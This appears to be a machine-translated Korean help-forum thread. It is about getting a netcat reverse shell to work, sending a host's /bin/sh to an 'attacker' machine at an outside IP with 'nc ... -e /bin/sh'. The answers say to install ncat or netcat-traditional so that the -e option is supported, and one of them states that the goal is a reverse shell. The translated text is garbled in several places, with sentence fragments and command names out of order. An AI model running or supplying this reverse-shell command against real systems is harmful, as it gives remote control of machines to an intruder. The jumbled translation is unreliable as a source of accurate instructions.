다른 (공격자) 컴퓨터에서 호스트 컴퓨터의 셸을 가져오려고 합니다. 공격자 컴퓨터가 듣고 있습니다. 내 호스트에서 다음 명령을 실행하고 있습니다.
nc 123.123.123.12 4444 -e /bin/sh
내가 얻는 결과는 다음과 같습니다.
nc: invalid option -- 'e'
usage: nc [-46CDdFhklNnrStUuvZz] [-I length] [-i interval] [-M ttl]
[-m minttl] [-O length] [-P proxy_username] [-p source_port]
[-q seconds] [-s source] [-T keyword] [-V rtable] [-W recvlimit] [-w timeout]
[-X proxy_protocol] [-x proxy_address[:port]] [destination] [port]
답변1
netcat에는 다양한 변형이 있습니다. nmap.org에서 개발한 netcat 버전을 설치하세요.
내 Ubuntu 시스템에는 2개의 패키지가 있으며 netcat
.nmap ncat
중 하나가 ncat
이 -e
옵션을 지원합니다. 다른 쪽은 그렇지 않습니다.
배포판에 적합한 패키지를 찾아야 합니다.
편집: 켜기칼리리눅스(2022.3), 이 패키지는 옵션 없이 netcat 버전을 설치 netcat-openbsd
합니다 . 이 옵션이 포함된 버전을 원하면 패키지를 설치하세요 . 일단 설치되면 실행될 바이너리는 다음과 같습니다.netcat-traditional
-e
-e
ncat
ncat
/usr/bin/ncat
답변2
~처럼@마스터Gncat
제안에 따르면 nmap 변형을 얻으려면 다음 명령을 사용해야 합니다 .
$ apt install ncat
그 후에 ncat
는 대신 명령을 사용하십시오 nc
.
답변3
리버스 쉘을 만들고 싶었지만 다음 메시지와 함께 실패했습니다.
nc: invalid option -- 'e'
ncat
여기서는 대신 사용했으며 nc
둘 다 동일한 기능을 가지고 있습니다.